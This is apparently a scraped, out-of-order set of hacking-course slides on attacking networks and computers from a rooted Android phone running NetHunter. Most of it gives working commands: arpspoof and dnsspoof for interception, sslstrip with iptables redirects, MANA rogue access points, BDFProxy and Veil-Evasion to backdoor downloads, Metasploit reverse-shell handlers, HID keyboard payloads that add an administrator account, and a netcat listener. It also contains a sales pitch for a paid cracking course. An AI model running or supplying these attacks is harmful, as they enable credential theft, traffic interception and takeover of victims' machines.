Learn

Learn Hacking Using Android

BAD USB

MITM Attack

ARP Poisoning

Man In The Middle Attacks

Preparing

This is one of the most dangerous and effective attacks that can be used, it is used to redirect packets to and from any client to our device, this makes us the "man in the middle" which means we can read/modify/drop these packets.

This is just another method of becoming the MITM (just like the bad USB attack), this attack is more effective and dangerous because it's very hard to protect against it as it exploits the insecure way that ARP works, it also does not require any interaction with the target machine.

This is an implementaiton of the bad USB attack where the phone will pretend to be a network card once plugged into a computer forcing all traffic through the phone. Using any sniffer will allow us to read all packets to/from target machine.

In this section we will learn how to prepare our device for penetration testing.

1. Install device drivers on computer.

2. Unlock the device.

3. Root it, this will basically install a root user on the device. Root user is a user that can have full permission on the deive, this is very important to have full control over the device.

4. Install NetHunter; this is an operating system designed for penetration testing using android devices.



How it Works

Insert HTML

Default Network

Poisoned Network

Step One

Step Two

This means the router thinks that I am the client, and the client thinks that I am the router. So my device is in the middle of the connection between the client and the router, ie:every packet that is going to/from the client will have to go through my device first.

Only nexus devices and One Plus are officially supported at the moment, but there are un-official releases for other devices. The installation process is the same for all officially supported devices

Now we will send an ARP response to the router this time telling it that “I am the client”, this done by telling the router that the device with the client ip address has MY MAC address.

We will first send an ARP response to the client telling it that “I am the Router”, this done by telling the client that the device with the router ip address has MY MAC address.

ARP main security issues:

1. Each ARP request/response is trusted.

2. Clients can accept responses even if they did not send a request.

Request

ARP Response

Reply

This enables us to run a html code on any page visited by the target client. This means that we can use html code injection and XSS vulnerabilities against all websites visited by the client, this allows us to do many attacks such as stealing the cookies, but since we can poison the network we can do these attacks in better more reliable ways. This feature is still useful if you want to mess with the client or add a certain code to ALL pages visited by the client

1. Download flushiptables.sh file in /sdcard/files

2. Go to Kali Launcher >> Launch Shell in Terminal

> cd /sdcard/files #change working directory to /sdcard/files

> bash flushiptables.sh #run flushiptables.sh

> bash startbadusb-kitkat.sh #for kitkat

> bash startbadusb-lollipop.sh #for lollipop

Now all the requests/responses sent to/from the target machine will flow through our deivce, this makes us the Man In The Midle (MITM - hence the attack name), this means we can read and modify all data sent to/from target device !

Sniffing Usernames

and Passwords

ARP Spoof

Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to poison the network and redirect traffic to flow through our device.

1. Tell the target client that I am the router.

> arpspoof -i [interface] -t [Target IP] [AP IP]

> arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1 #Example

2. Tell the AP that I am the target client.

> arpspoof -i [interface] -t [AP IP] [Target IP]

> arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5

3. Enable IP forward to allow packets to flow through our device without being dropped.

> echo 1 > /proc/sys/net/ipv4/ip_forward

Capture/Replace Images

When we launch a MITM attack, all packets will flow through our device, so we can read all the info sent to/from the target client including URLs, usernames and passwords. We will use Zanti2 to poison the network and read this info.

By tapping on "Logged Images" you will see all the images loaded to the target client, you can also replace all of these images by another one using the "Replace Images" feature.

Sniffing Data

DNS Spoofing

Bypassing HTTPS/SSL

DNS Spoofing allows us to redirect any request to a domain to another domain, for example we can redirect any request to facebook.com to a fake acebook page !!

We will use a tool called dnsspoof to do this.

1. create a dnsspoof config file.

2. run dnspsoof

> dnsspoof -i rndis0 -f /path/to/config/file

Now that all the data is flowing is through our device, all we have to do is store it in a file and read it later!

We will use a tool called tshark to do this.

> tshark -i rndis0 -w capture-file.log

#This will store captured data in capture-file.log

Now we can open this file using any packet analyzer, I prefere Wireshark

Capture/Intercept Downloads

DNS Spoofing

Websites like facebook,yahoo....ect use HTTPS in their login page, this means that these pages are validated using an SSL certificate and there for will show a warning to the user that the certificate is invalid if the there was a MITM. To bypass this all you have to do is enable the "SSLstrip" feature in Zanti2, this will redirect all requests to HTTPS to HTTP, therefore the client will not see a

warning

Bypassing HTTPS

We can also capture files downloaded by the target client, not only that but we can replace them with another file, so when they download a pdf for example we can replace it with a malicious one so that it runs a back door or a key logger on the target machine ! Files are stored in

sdcard/ZANTI2_CAPTURES

DNS Spoofing allows us to redirect any request to a certain domain to another domain, for example we can redirect any request to facebook.com to a fake acebook page !!

Zanti2 only allows us to redirect ALL requests to a certain domain, therefore I recommend using dnsspoof the same way we used it with the badUSB attack.

Websites like hotmail, yahoo....etc use HTTPS in their login page, this means that these pages are validated using an SSL certificate and therefor will show a warning to the user that the certificate is invalid if the there was a MITM. To bypass this we will use a tool calld sslstrip, this tool will downgrade https connections to http.

> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

> sslstrip -p



Spying

Evil Access Point

Weaponizing

Introduction

NetHunter Home

This is the main menu of NetHunter, this menu gives us access to all of the features of NetHunter, it also gives access to the main or most powerful attacks that can be launched using NetHunter

In this section we will learn how to create an access point, so that others can connect it to access the internet.

This is no ordinary access point because we will automatically be the man in the middle as all data will be sent to us because we are the server, this means that we will be able to capture all credentials entered by clients, modify packets ... etc.

We will explain all of these tools and attacks in detail in the coming lectures.

MANA-Toolkit

We simply do this by creating a hot spot and then sniff/modify data the same way we did with the badUSB attack.

Mana-toolkit however makes the whole process much simpler, it automatically creates a new AP and starts sslstrip/firelamp and even attempts to bypass HSTS which is used by Gmail and Facebook.

Another cool feature in Mana is that it allows us to tether the connection from one wireless card to another instead of limiting us to using 3G.

• Weaponizing
• Information Gathering
• Spying
• Exploitation

Mana has 3 main start scripts:

1. start-noupstream: starts an AP with NO internet connection.

2. start-nat-simple: this starts a regular AP using internet connection in the upstream interface.

3. start-nat-full: starts AP with internet connection, it also starts sslstrip,sslsplit, firelamp and attempts to bypass HSTS.

To start a script run:

> bash /usr/share/mana-toolkit/run-mana/script-name.sh

The captured traffic will be in /var/lib/mana-toolkit

Network Mapping

• Discover all connected devices to the network.
• Determine the operating system of each device.
• Determine the open ports and services running on these ports.

Network Discovery (War Driving)

Here we will learn how to discover all wi-fi networks within our range and display useful information about them like:

• ESSID or network name.
• Network MAC address.
• Network channel.
• Encryption type.
• Speed.
• Signal strength.

BDF Proxy

We will use an app called wifi analyzer which does all of the above and also features a signal strength meter which can be used to find spots with the strongest signal.

Cracking Wi-Fi Keys

NetHunter comes with aircrack-ng suit and reaver pre-installed, these two suits are all you need to crack Wi-Fi keys weather its a WEP/WPA or WPA2.

The Backdoor Factory Proxy is a proxy that will patch binaries with a backdoor during download, so any binary downloaded by the target client will be converted to a backdoor while maintaining the binary's functionality.

DBFProxy can be used with a fake access point or with a normal access point if we can MITM it.

To do this you need a powerful wireless card that supports monitor mode and packet injection, an example of this card is Alfa awus36.

These external wireless cards connect through USB, so you will need an OTG Y cable to use it.

The process of cracking these keys is the same weather it's done from a PC or from an Android device because the programs used are the same, therefore to avoid going off topic I will not explain how to crack Wi-Fi keys, however I have a full course explaining multiple attacks against each encryption, so if you are interested into taking it just message me and I will give it to you for $10 only.

Course Link:

https://www.udemy.com/learn-cracking-wi-fi-passwordskeys-wepwpawpa2/

1. Configure shell code settings

Advanced Scan

Basic Scan

By tapping on any discovered device, we can run a number of advanced scans that display more information about the device.

Note: HOST is the ip of the device that the client will connect to (ie: the one that will be listening for connections).

Zanti2

> nano /etc/bdfproxy/bdfproxy.cfg

Zanti2 is a free mobile penetration testing framework that allows us to perform a number penetration testing tasks.

In this lesson we will see how to use it to map the network our device is connected to show the connected devices and some basic info about them such as their operating system, IP address, Mac Address and opened ports.

1. Ping scan/Quick scan/OS detection/Regular Scan : Will not display more than the basic info you get with the basic scan that Zanti performs.

2. Intense Scan: Slower than 1, more detailed info about the opened ports.

3. Slow comprehensive scan: Very Slow, will display more info about the target including filtered ports.

These are just sample scans, you can experiment with the scan options and see the difference between them.

2. Start BDFProxy

> bdfproxy

> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3. ARP Poison the target (no need to do this with Mana)

4. Start Metarsploit to listen for connections.

> /etc/init.d/postgresql start

> /etc/init.d/metasploit start

> msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc

Fake Download Attack

Here we will use the same download interception attack we explained in the spying section so that when the target client attempts to download a program it gets replaced with a backdoor.

1. Create a backdoor.

Detecting Undetectable Backdoors

Exploitation

apt-get install veil-evasion #to install veil-evasion

veil-evasion

use 8

set LHOST [YOUR IP]

generate

Information Gathering

2. Listen for connections

Spider Foot

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_http

set LHOST [YOUR IP]

set LPORT [PORT]

• Check properties of the file.
• Is it what it seems to be?
• Run the file in a virtual machine and check resources.
• Use an online Sandbox service.

> https://www.hybrid-analysis.com/

Spider foot is an open source foot printing tool.It is designed to make the process of information gathering easier, it allows us to gather a lot of information about a domain and creates a nice report at the end with all the gathered info.

3. Run Zanti >> select target client >> MITM >> Intercept Downloads. Select exe for the file type and choose the backdoor we created in step 1.

> kalimenu

>> information gathering >> spiderFoot

Then navigate to 127.0.0.1:5001

Note: the fake does not have to be a backdoor, it can be any file such as a keylogger/virus ...etc.

Now choose a scan name, enter the target domain, select the data that you want to collect (you can group them by module) and tap "Run Scan".

Once finished tap on the "Brows" tab to see the final report or download it

HID Attack

HID Ducky Scripts

This attack allows us to execute any command or gain FULL access to any windows computer connected to our android device

This menu allow us to write our own HID keyboard attacks.

We first need to write it as a rubber ducky script and then it can convert it to HID attack format for us.

I am a keyboard

How it works?

Alternatively you can use any existing rubber ducky script or use the payload generator to make one.

PS: links for the payload generator and rubber ducky script writing are in the resources menu on the right.

Once connected, the Android device will trick the computer and pretend to be a keyboard, then it will send a number of commands very quickly to the computer, these commands can be used to run any DOS command or gain full access to the machine using the Powersploit option.

This attack will work even of the autorun feature is disabled as the commands are sent as normal key strokes.

There are two variations of this attack :

Linux Shell

Download & Execute

We can use the exact same script that we used with OSX to get a shell on any linux device, the only thing that we need to change is how to laumch the terminal, in Ubuntu distros for example its alt+F2.

Here we will use a simple script that will download a file and execute it.

This is really useful because this means we can run ANY file we want only by connecting our android device to a computer, this file can be a backdoor, virus, keylogger ...etc.

OSX Shell

2. PowerSploit

1. Windows CMD

PS the script is in the resources menu on the right

This will create a server that will give us full access to the target computer.

This will allow us to run windows commands on the target machine.

Just enter the commands you want to run in the "source" box and click on "update" then "Execute".

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_https

set LHOST [YOUR IP]

set LPORT [PORT]

First of all we need to listen on a certain port for incoming connections so that the target machine can connect back to us.

This can be done from a laptop or from your android device.

The HID Keyboard attacks work on ALL operating systems including OSX, so today we will use a simple script to gain full access to any OSX machine once its connected to our Android device via USB.

This script will send a connection to a certain IP address, you need to use a tool called net cat to recieve this connection. Netcat is pre installed in NetHunter and in Kali linux, it can also be installed on windows.

Run the following command to listen for incoming connections:

Ex:

This is the device that will be used to control the target machine

net user test /add

net localgroup administrators test /add

Now you need to configure the payload on your android device, set the IP and port values as the same values that you chose in the previous step and leave the URL as it is.

This will add a user "test" and add it to the administrators group

Now all you have to do is click on update and execute.

nc -vv -l -p [PORT]